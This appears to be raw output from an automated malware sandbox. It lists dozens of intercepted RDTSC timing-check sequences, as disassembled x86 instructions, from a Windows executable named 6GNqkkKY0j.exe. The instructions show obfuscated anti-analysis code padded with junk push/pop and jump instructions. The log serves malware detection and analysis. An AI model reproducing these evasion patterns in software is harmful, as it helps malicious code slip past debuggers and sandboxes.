Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53A07DC second address: 53A07ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, bh 0x00000005 mov edi, eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53A07ED second address: 53A07F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53A07F1 second address: 53A0807 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE0B8ED42h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53A0807 second address: 53A080C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53A080C second address: 53A0835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cl, dh 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b popad 0x0000000c push dword ptr [ebp+08h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0FE0B8ED48h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53A0885 second address: 53A08D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, ax 0x00000007 popad 0x00000008 popad 0x00000009 mov esi, eax 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushfd 0x00000010 jmp 00007F0FE14B0510h 0x00000015 sub ax, A008h 0x0000001a jmp 00007F0FE14B050Bh 0x0000001f popfd 0x00000020 popad 0x00000021 mov esi, 00BB467Fh 0x00000026 popad 0x00000027 je 00007F0FE14B0575h 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F0FE14B0511h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53A08D6 second address: 53A08DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53A08DC second address: 53A08E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53A08F2 second address: 53A0915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F0FE0B8ED3Eh 0x0000000a and ah, FFFFFFC8h 0x0000000d jmp 00007F0FE0B8ED3Bh 0x00000012 popfd 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53A0915 second address: 53A0973 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE14B0519h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, esi 0x0000000b jmp 00007F0FE14B050Eh 0x00000010 pop esi 0x00000011 jmp 00007F0FE14B0510h 0x00000016 leave 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push edi 0x0000001b pop ecx 0x0000001c jmp 00007F0FE14B0519h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53A0973 second address: 53A0979 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53A0979 second address: 53901BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c sub esp, 04h 0x0000000f xor ebx, ebx 0x00000011 cmp eax, 00000000h 0x00000014 je 00007F0FE14B066Ah 0x0000001a mov dword ptr [esp], 0000000Dh 0x00000021 call 00007F0FE651C843h 0x00000026 mov edi, edi 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F0FE14B0515h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53901BB second address: 5390216 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0FE0B8ED47h 0x00000009 jmp 00007F0FE0B8ED43h 0x0000000e popfd 0x0000000f call 00007F0FE0B8ED48h 0x00000014 pop esi 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F0FE0B8ED3Dh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5390216 second address: 539023D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE14B0511h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0FE14B050Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 539023D second address: 5390262 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 mov bx, 5A6Eh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e pushad 0x0000000f jmp 00007F0FE0B8ED3Bh 0x00000014 mov dh, cl 0x00000016 popad 0x00000017 sub esp, 2Ch 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d mov eax, ebx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5390262 second address: 53902EA instructions: 0x00000000 rdtsc 0x00000002 mov edi, 32DFA7CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F0FE14B050Fh 0x0000000f sub ecx, 5E6BA07Eh 0x00000015 jmp 00007F0FE14B0519h 0x0000001a popfd 0x0000001b popad 0x0000001c xchg eax, ebx 0x0000001d pushad 0x0000001e mov ebx, 219535DEh 0x00000023 popad 0x00000024 push eax 0x00000025 pushad 0x00000026 mov ecx, 58046A51h 0x0000002b mov bh, ah 0x0000002d popad 0x0000002e xchg eax, ebx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 mov ah, 89h 0x00000034 pushfd 0x00000035 jmp 00007F0FE14B0517h 0x0000003a add ch, FFFFFFEEh 0x0000003d jmp 00007F0FE14B0519h 0x00000042 popfd 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53902EA second address: 53902FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0FE0B8ED3Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53902FA second address: 53902FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5390344 second address: 539035C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0FE0B8ED44h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 539035C second address: 5390383 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE14B050Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub ebx, ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0FE14B0512h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5390383 second address: 5390397 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub edi, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dh, ch 0x0000000f mov bx, BE32h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5390397 second address: 539044E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, si 0x00000006 pushfd 0x00000007 jmp 00007F0FE14B0512h 0x0000000c or al, 00000048h 0x0000000f jmp 00007F0FE14B050Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 inc ebx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F0FE14B0514h 0x00000020 add ax, FDA8h 0x00000025 jmp 00007F0FE14B050Bh 0x0000002a popfd 0x0000002b pushfd 0x0000002c jmp 00007F0FE14B0518h 0x00000031 xor al, 00000008h 0x00000034 jmp 00007F0FE14B050Bh 0x00000039 popfd 0x0000003a popad 0x0000003b test al, al 0x0000003d pushad 0x0000003e pushfd 0x0000003f jmp 00007F0FE14B0514h 0x00000044 sub eax, 3C4C9268h 0x0000004a jmp 00007F0FE14B050Bh 0x0000004f popfd 0x00000050 mov di, ax 0x00000053 popad 0x00000054 je 00007F0FE14B06FDh 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d mov cx, bx 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 539044E second address: 539047B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE0B8ED3Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea ecx, dword ptr [ebp-14h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0FE0B8ED45h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53904F8 second address: 53904FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53904FE second address: 5390502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5390502 second address: 539050E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53905C4 second address: 53905C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53905C9 second address: 5390611 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 call 00007F0FE14B0510h 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jne 00007F1051BBE3BFh 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F0FE14B050Ah 0x0000001d jmp 00007F0FE14B0515h 0x00000022 popfd 0x00000023 mov si, D1E7h 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5390611 second address: 539062D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0FE0B8ED48h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 539062D second address: 5390658 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE14B050Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebx, dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0FE14B0515h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5390658 second address: 5390668 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0FE0B8ED3Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5390668 second address: 53906E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-2Ch] 0x0000000b pushad 0x0000000c movsx ebx, ax 0x0000000f push eax 0x00000010 pushfd 0x00000011 jmp 00007F0FE14B0515h 0x00000016 or eax, 5C94D676h 0x0000001c jmp 00007F0FE14B0511h 0x00000021 popfd 0x00000022 pop esi 0x00000023 popad 0x00000024 push ecx 0x00000025 pushad 0x00000026 pushad 0x00000027 push ecx 0x00000028 pop edi 0x00000029 call 00007F0FE14B0514h 0x0000002e pop eax 0x0000002f popad 0x00000030 mov bx, D286h 0x00000034 popad 0x00000035 mov dword ptr [esp], esi 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F0FE14B0518h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53906E5 second address: 5390722 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 19A953D4h 0x00000008 pushfd 0x00000009 jmp 00007F0FE0B8ED3Dh 0x0000000e jmp 00007F0FE0B8ED3Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 nop 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F0FE0B8ED45h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5390722 second address: 5390727 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5390727 second address: 5390743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F0FE0B8ED3Dh 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5390743 second address: 5390747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5390747 second address: 539075A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE0B8ED3Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 539075A second address: 539075F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 539075F second address: 53907F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F0FE0B8ED45h 0x0000000a xor cx, 4EB6h 0x0000000f jmp 00007F0FE0B8ED41h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 nop 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F0FE0B8ED3Ch 0x00000020 jmp 00007F0FE0B8ED45h 0x00000025 popfd 0x00000026 pushfd 0x00000027 jmp 00007F0FE0B8ED40h 0x0000002c jmp 00007F0FE0B8ED45h 0x00000031 popfd 0x00000032 popad 0x00000033 xchg eax, ebx 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F0FE0B8ED3Dh 0x0000003b rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53907F0 second address: 5390800 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0FE14B050Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5390800 second address: 5390804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 539083B second address: 5390840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5390840 second address: 5390008 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE0B8ED44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b pushad 0x0000000c mov dl, cl 0x0000000e mov si, dx 0x00000011 popad 0x00000012 test esi, esi 0x00000014 pushad 0x00000015 jmp 00007F0FE0B8ED3Bh 0x0000001a mov edi, eax 0x0000001c popad 0x0000001d je 00007F105129CB19h 0x00000023 xor eax, eax 0x00000025 jmp 00007F0FE0B6846Ah 0x0000002a pop esi 0x0000002b pop edi 0x0000002c pop ebx 0x0000002d leave 0x0000002e retn 0004h 0x00000031 nop 0x00000032 sub esp, 04h 0x00000035 mov esi, eax 0x00000037 xor ebx, ebx 0x00000039 cmp esi, 00000000h 0x0000003c je 00007F0FE0B8EE75h 0x00000042 call 00007F0FE5BFAD7Ch 0x00000047 mov edi, edi 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5390008 second address: 5390020 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE14B0514h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5390020 second address: 5390026 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5390026 second address: 539002A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 539002A second address: 5390074 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F0FE0B8ED46h 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F0FE0B8ED40h 0x00000016 mov ebp, esp 0x00000018 pushad 0x00000019 call 00007F0FE0B8ED3Eh 0x0000001e mov edi, eax 0x00000020 pop ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5390074 second address: 5390118 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F0FE14B0513h 0x00000008 and cl, FFFFFF9Eh 0x0000000b jmp 00007F0FE14B0519h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 xchg eax, ecx 0x00000015 jmp 00007F0FE14B050Eh 0x0000001a push eax 0x0000001b jmp 00007F0FE14B050Bh 0x00000020 xchg eax, ecx 0x00000021 jmp 00007F0FE14B0516h 0x00000026 mov dword ptr [ebp-04h], 55534552h 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov ecx, edi 0x00000032 pushfd 0x00000033 jmp 00007F0FE14B0519h 0x00000038 xor al, FFFFFF96h 0x0000003b jmp 00007F0FE14B0511h 0x00000040 popfd 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 539013A second address: 539013E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 539013E second address: 5390182 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F0FE14B0514h 0x00000008 or eax, 0C5A7618h 0x0000000e jmp 00007F0FE14B050Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 leave 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F0FE14B0515h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5390182 second address: 5390188 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5390BCD second address: 5390BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5390BD1 second address: 5390BD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5390BD7 second address: 5390BDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5390BDD second address: 5390C3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a call 00007F0FE0B8ED43h 0x0000000f pop ebx 0x00000010 mov esi, 41350B2Bh 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 pushad 0x00000018 mov cx, B4A3h 0x0000001c pushfd 0x0000001d jmp 00007F0FE0B8ED48h 0x00000022 add ax, EDE8h 0x00000027 jmp 00007F0FE0B8ED3Bh 0x0000002c popfd 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5390C3A second address: 5390C3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5390C3E second address: 5390C44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5390C44 second address: 5390C77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE14B050Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [75AF459Ch], 05h 0x00000010 jmp 00007F0FE14B0510h 0x00000015 je 00007F1051BAE29Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push edx 0x0000001f pop ecx 0x00000020 mov esi, ebx 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5390C77 second address: 5390CB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0FE0B8ED40h 0x00000009 and ah, FFFFFFD8h 0x0000000c jmp 00007F0FE0B8ED3Bh 0x00000011 popfd 0x00000012 mov esi, 26CC148Fh 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F0FE0B8ED3Ch 0x00000024 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5390CB3 second address: 5390CB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5390DB0 second address: 5390DD6 instructions: 0x00000000 rdtsc 0x00000002 call 00007F0FE0B8ED41h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [ebp-1Ch], esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0FE0B8ED3Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5390DD6 second address: 5390DE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0FE14B050Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5390E15 second address: 5390E84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 pushfd 0x00000007 jmp 00007F0FE0B8ED43h 0x0000000c or ch, 0000005Eh 0x0000000f jmp 00007F0FE0B8ED49h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 test al, al 0x0000001a jmp 00007F0FE0B8ED3Eh 0x0000001f je 00007F105128285Ch 0x00000025 pushad 0x00000026 mov cx, E5EDh 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F0FE0B8ED48h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5390E84 second address: 5390EAE instructions: 0x00000000 rdtsc 0x00000002 mov dx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 cmp dword ptr [ebp+08h], 00002000h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push ebx 0x00000013 pop esi 0x00000014 jmp 00007F0FE14B0515h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53A09DC second address: 53A09E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53A09E2 second address: 53A09E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53A09E6 second address: 53A0AC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov edx, 4B85C94Ch 0x0000000f call 00007F0FE0B8ED45h 0x00000014 pushfd 0x00000015 jmp 00007F0FE0B8ED40h 0x0000001a xor ecx, 1CDB2898h 0x00000020 jmp 00007F0FE0B8ED3Bh 0x00000025 popfd 0x00000026 pop esi 0x00000027 popad 0x00000028 mov ebp, esp 0x0000002a pushad 0x0000002b mov ax, bx 0x0000002e pushfd 0x0000002f jmp 00007F0FE0B8ED41h 0x00000034 adc si, CE36h 0x00000039 jmp 00007F0FE0B8ED41h 0x0000003e popfd 0x0000003f popad 0x00000040 xchg eax, esi 0x00000041 jmp 00007F0FE0B8ED3Eh 0x00000046 push eax 0x00000047 jmp 00007F0FE0B8ED3Bh 0x0000004c xchg eax, esi 0x0000004d pushad 0x0000004e pushad 0x0000004f pushfd 0x00000050 jmp 00007F0FE0B8ED42h 0x00000055 jmp 00007F0FE0B8ED45h 0x0000005a popfd 0x0000005b mov bh, al 0x0000005d popad 0x0000005e mov bx, C300h 0x00000062 popad 